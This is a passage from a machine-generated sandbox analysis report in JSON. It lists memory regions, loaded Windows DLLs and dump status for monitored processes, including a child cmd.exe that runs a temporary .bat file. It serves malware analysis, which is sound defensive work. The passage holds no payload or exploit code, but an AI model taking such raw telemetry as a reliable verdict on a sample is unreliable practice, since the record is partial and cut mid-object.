"dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1968111616, "type": "region", "version": 1 }, "end_va": 1968152575, "entry_point": 1968111616, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_1105", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1968111616, "timestamp": "00:03:28.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1968177152, "type": "region", "version": 1 }, "end_va": 1968881663, "entry_point": 1968177152, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_1106", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1968177152, "timestamp": "00:03:28.823", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1167360, "start_va": 1968898048, "type": "region", "version": 1 }, "end_va": 1970065407, "entry_point": 1968898048, "filename": "\\Windows\\SysWOW64\\crypt32.dll", "id": "region_1107", "name": "crypt32.dll", "norm_filename": "c:\\windows\\syswow64\\crypt32.dll", "region_type": "memory_mapped_file", "start_va": 1968898048, "timestamp": "00:03:28.839", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1971191808, "type": "region", "version": 1 }, "end_va": 1971240959, "entry_point": 1971191808, "filename": "\\Windows\\SysWOW64\\msasn1.dll", "id": "region_1108", "name": "msasn1.dll", "norm_filename": "c:\\windows\\syswow64\\msasn1.dll", "region_type": "memory_mapped_file", "start_va": 1971191808, "timestamp": "00:03:28.846", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1971257344, "type": "region", "version": 1 }, "end_va": 1972240383, "entry_point": 1971257344, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_1109", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1971257344, "timestamp": "00:03:28.853", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1972240384, "type": "region", "version": 1 }, "end_va": 1972342783, "entry_point": 1972240384, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_1110", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1972240384, "timestamp": "00:03:28.861", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 1974140928, "type": "region", "version": 1 }, "end_va": 1974730751, "entry_point": 1974140928, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_1111", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1974140928, "timestamp": "00:03:28.867", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 282624, "start_va": 1979580416, "type": "region", "version": 1 }, "end_va": 1979863039, "entry_point": 1979580416, "filename": "\\Windows\\SysWOW64\\Wldap32.dll", "id": "region_1112", "name": "wldap32.dll", "norm_filename": "c:\\windows\\syswow64\\wldap32.dll", "region_type": "memory_mapped_file", "start_va": 1979580416, "timestamp": "00:03:28.917", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_1113", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:03:28.924", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1114", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:03:28.925", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00001115-addr_0x0000000000290000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_764", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2686976, "type": "region", "version": 1 }, "end_va": 2752511, "entry_point": 0, "filename": null, "id": "region_1115", "name": "private_0x0000000000290000", "norm_filename": null, "region_type": "private_memory", "start_va": 2686976, "timestamp": "00:03:29.215", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 4456448, "type": "region", "version": 1 }, "end_va": 6062079, "entry_point": 0, "filename": null, "id": "region_1116", "name": "pagefile_0x0000000000440000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4456448, "timestamp": "00:03:29.215", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1966407680, "type": "region", "version": 1 }, "end_va": 1966800895, "entry_point": 1966407680, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_1117", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1966407680, "timestamp": "00:03:29.215", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1970339840, "type": "region", "version": 1 }, "end_va": 1971175423, "entry_point": 1970339840, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_1118", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1970339840, "timestamp": "00:03:29.221", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00001119-addr_0x0000000000020000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_765", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1119", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:03:29.233", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00001120-addr_0x0000000000030000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_766", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 200703, "entry_point": 0, "filename": null, "id": "region_1120", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:03:29.233", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 7208960, "type": "region", "version": 1 }, "end_va": 8785919, "entry_point": 0, "filename": null, "id": "region_1121", "name": "pagefile_0x00000000006e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7208960, "timestamp": "00:03:29.233", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 8847360, "type": "region", "version": 1 }, "end_va": 29818879, "entry_point": 0, "filename": null, "id": "region_1122", "name": "pagefile_0x0000000000870000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8847360, "timestamp": "00:03:29.234", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 29818880, "type": "region", "version": 1 }, "end_va": 32763903, "entry_point": 29818880, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_1123", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 29818880, "timestamp": "00:03:29.234", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 86016, "start_va": 1934360576, "type": "region", "version": 1 }, "end_va": 1934446591, "entry_point": 1934360576, "filename": "\\Windows\\SysWOW64\\regapi.dll", "id": "region_1124", "name": "regapi.dll", "norm_filename": "c:\\windows\\syswow64\\regapi.dll", "region_type": "memory_mapped_file", "start_va": 1934360576, "timestamp": "00:03:29.647", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00001125-addr_0x0000000000210000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_767", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2162688, "type": "region", "version": 1 }, "end_va": 2166783, "entry_point": 0, "filename": null, "id": "region_1125", "name": "private_0x0000000000210000", "norm_filename": null, "region_type": "private_memory", "start_va": 2162688, "timestamp": "00:04:00.471", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00001126-addr_0x0000000000220000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_768", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2228224, "type": "region", "version": 1 }, "end_va": 2232319, "entry_point": 0, "filename": null, "id": "region_1126", "name": "private_0x0000000000220000", "norm_filename": null, "region_type": "private_memory", "start_va": 2228224, "timestamp": "00:04:00.489", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00001127-addr_0x0000000000230000-size_0x0000000000011000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_769", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 69632, "start_va": 2293760, "type": "region", "version": 1 }, "end_va": 2363391, "entry_point": 0, "filename": null, "id": "region_1127", "name": "private_0x0000000000230000", "norm_filename": null, "region_type": "private_memory", "start_va": 2293760, "timestamp": "00:04:00.490", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1972699136, "type": "region", "version": 1 }, "end_va": 1974124543, "entry_point": 1972699136, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_1128", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1972699136, "timestamp": "00:04:00.498", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00001129-addr_0x0000000000250000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_770", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 2490367, "entry_point": 0, "filename": null, "id": "region_1129", "name": "private_0x0000000000250000", "norm_filename": null, "region_type": "private_memory", "start_va": 2424832, "timestamp": "00:04:00.704", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00001130-addr_0x0000000000260000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_771", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2490368, "type": "region", "version": 1 }, "end_va": 2555903, "entry_point": 0, "filename": null, "id": "region_1130", "name": "private_0x0000000000260000", "norm_filename": null, "region_type": "private_memory", "start_va": 2490368, "timestamp": "00:04:00.704", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00001131-addr_0x0000000002020000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_772", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 33685504, "type": "region", "version": 1 }, "end_va": 33751039, "entry_point": 0, "filename": null, "id": "region_1131", "name": "private_0x0000000002020000", "norm_filename": null, "region_type": "private_memory", "start_va": 33685504, "timestamp": "00:04:00.705", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00001132-addr_0x0000000002160000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_773", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 34996224, "type": "region", "version": 1 }, "end_va": 35061759, "entry_point": 0, "filename": null, "id": "region_1132", "name": "private_0x0000000002160000", "norm_filename": null, "region_type": "private_memory", "start_va": 34996224, "timestamp": "00:04:00.705", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16777216, "start_va": 35061760, "type": "region", "version": 1 }, "end_va": 51838975, "entry_point": 0, "filename": null, "id": "region_1133", "name": "private_0x0000000002170000", "norm_filename": null, "region_type": "private_memory", "start_va": 35061760, "timestamp": "00:04:00.705", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16384, "start_va": 2555904, "type": "region", "version": 1 }, "end_va": 2572287, "entry_point": 0, "filename": null, "id": "region_1134", "name": "pagefile_0x0000000000270000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2555904, "timestamp": "00:04:00.706", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16384, "start_va": 2490368, "type": "region", "version": 1 }, "end_va": 2506751, "entry_point": 0, "filename": null, "id": "region_1135", "name": "pagefile_0x0000000000260000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2490368, "timestamp": "00:04:00.707", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1958674432, "type": "region", "version": 1 }, "end_va": 1958764543, "entry_point": 1958674432, "filename": "\\Windows\\SysWOW64\\cryptsp.dll", "id": "region_1162", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\syswow64\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1958674432, "timestamp": "00:04:00.755", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 245760, "start_va": 2752512, "type": "region", "version": 1 }, "end_va": 2998271, "entry_point": 2752512, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_1163", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 2752512, "timestamp": "00:04:00.761", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 245760, "start_va": 2752512, "type": "region", "version": 1 }, "end_va": 2998271, "entry_point": 2757261, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_1164", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 2752512, "timestamp": "00:04:00.767", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1958412288, "type": "region", "version": 1 }, "end_va": 1958653951, "entry_point": 1958417037, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_1168", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1958412288, "timestamp": "00:04:00.777", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00001171-addr_0x00000000002a0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_774", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 2752512, "type": "region", "version": 1 }, "end_va": 3014655, "entry_point": 0, "filename": null, "id": "region_1171", "name": "private_0x00000000002a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2752512, "timestamp": "00:06:38.424", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00001172-addr_0x0000000002030000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_775", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 33751040, "type": "region", "version": 1 }, "end_va": 34799615, "entry_point": 0, "filename": null, "id": "region_1172", "name": "private_0x0000000002030000", "norm_filename": null, "region_type": "private_memory", "start_va": 33751040, "timestamp": "00:06:38.424", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00001173-addr_0x000000007efd8000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_776", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 2130542592, "type": "region", "version": 1 }, "end_va": 2130554879, "entry_point": 0, "filename": null, "id": "region_1173", "name": "private_0x000000007efd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130542592, "timestamp": "00:06:38.425", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1960706048, "type": "region", "version": 1 }, "end_va": 1961291775, "entry_point": 1960706048, "filename": "\\Windows\\SysWOW64\\oleaut32.dll", "id": "region_1175", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\syswow64\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1960706048, "timestamp": "00:08:10.461", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "cmd /c C:\\Users\\YBZ8BT~1\\AppData\\Local\\Temp\\tmp81BC.tmp.bat", "filename": "c:\\windows\\syswow64\\cmd.exe", "id": "proc_5", "image_name": "cmd.exe", "monitor_reason": "child_process", "monitored_id": 5, "origin_monitor_id": 4, "ref_parent_process": { "ref_id": "proc_4", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000005-region_00001176-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_777", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1176", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:08:10.475", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001177-addr_0x0000000000030000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_778", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_1177", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:08:10.475", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1178", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:08:10.476", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 344063, "entry_point": 0, "filename": null, "id": "region_1179", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:08:10.479", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 397311, "entry_point": 0, "filename": null, "id": "region_1180", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:08:10.479", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 1638399, "entry_point": 0, "filename": null, "id": "region_1181", "name": "private_0x0000000000150000", "norm_filename": null, "region_type": "private_memory", "start_va": 1376256, "timestamp": "00:08:10.479", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 3276800, "type": "region", "version": 1 }, "end_va": 4325375, "entry_point": 0, "filename": null, "id": "region_1182", "name": "private_0x0000000000320000", "norm_filename": null, "region_type": "private_memory", "start_va": 3276800, "timestamp": "00:08:10.480", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 311296, "start_va": 1238892544, "type": "region", "version": 1 }, "end_va": 1239203839, "entry_point": 1238892544, "filename": "\\Windows\\SysWOW64\\cmd.exe", "id": "region_1183", "name": "cmd.exe", "norm_filename": "c:\\windows\\syswow64\\cmd.exe", "region_type": "memory_mapped_file", "start_va": 1238892544, "timestamp": "00:08:10.482", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 1996357632, "type": "region", "version": 1 }, "end_va": 1998098431, "entry_point": 1996357632, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1184", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1996357632, "timestamp": "00:08:10.490", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 1998323712, "type": "region", "version": 1 }, "end_va": 1999896575, "entry_point": 1998323712, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_1185", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1998323712, "timestamp": "00:08:10.491", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_1186", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:08:10.492", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001187-addr_0x000000007efdb000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_779", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_1187", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:08:10.492", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001188-addr_0x000000007efde000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_780", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_1188", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:08:10.492", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001189-addr_0x000000007efdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_781", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_1189", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:08:10.493", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1190", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:08:10.493", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001191-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable" ], "ref_process_dump": { "ref_id": "proc_dump_782", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_1191", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:08:10.493", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": 